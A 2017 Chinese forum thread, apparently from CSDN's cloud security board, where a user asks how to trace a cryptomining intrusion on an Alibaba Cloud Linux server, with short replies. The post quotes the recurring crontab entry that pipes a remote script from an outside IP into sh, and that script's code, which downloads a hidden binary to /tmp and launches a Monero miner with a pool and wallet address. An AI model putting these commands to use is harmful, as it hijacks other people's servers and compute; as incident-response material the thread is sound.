请教大神,服务器被挖矿程序入侵如何排插

allenpony 2017-04-01 05:50:34
我用的阿里云的服务器,linux系统,有时CPU占用100%,这个时候根本连接不上服务器,只能通过强制重启的方式后才能使用,所以很难看到哪个进程占了资源,但至少我自己并没长时间跑什么程序。同时,非root用户下经常在crontab里发现类似如下的任务,删了又有
*/1 * * * * curl 107.179.126.28/_x2|sh
登陆这个网址有如下代码段
AGENT_FILE='/tmp/.X11_86'
if [ ! -f $AGENT_FILE ]; then
curl 107.179.126.28/_x3 > $AGENT_FILE
fi
if [ ! -x $AGENT_FILE ]; then
chmod +x $AGENT_FILE
fi
ps -ef|grep $AGENT_FILE|grep -v grep
if [ $? -ne 0 ]; then
nohup $AGENT_FILE -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB -p x > /dev/null 2>&1 &
fi


问过阿里的客服,说是被入侵了,但并没有告诉如何排插
我自己搜索了下,和有的被挖矿程序入侵的比较类似但是有不同,不同点如下
1、/usr/local/etc 里面没有东西
2、没有yam文件
3、没有/root/.ssh/KHK75NEOiq
4、/opt/minerd 和 /opt/KHK75NEOiq33 也没有
5、没有lady服务

所以挺奇怪这个crontab里的数据哪里来的,看crontrab日志也看不出个名堂,我现在唯一的办法是把crontab任务停了,但是这影响我的使用了,所以还望大家指教。
下面是另外个哥们儿的排查方法,我和他唯一相同的就是crontab里有数据
http://m.blog.csdn.net/article/details?id=51971121
...全文
8751 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
ppchaos 2019-08-30
  • 打赏
  • 举报
回复
挖矿呢 看看这个:monero.crypto-pool.fr
摩西云 2017-10-24
  • 打赏
  • 举报
回复
云服务器的重装下系统就解决了,不是吗
whu404 2017-05-03
  • 打赏
  • 举报
回复
也碰到这种情况了,哪位大神能指教下呢
williamxia8 2017-04-08
  • 打赏
  • 举报
回复
windows 2008 server也被人安装了挖矿机,而且还伪装成系统文件的名字,删不掉,该怎么处理
allenpony 2017-04-03
  • 打赏
  • 举报
回复
呃,没人知道么。。。

4,451

社区成员

发帖
与我相关
我的任务
社区描述
云计算 云安全相关讨论
社区管理员
  • 云安全社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧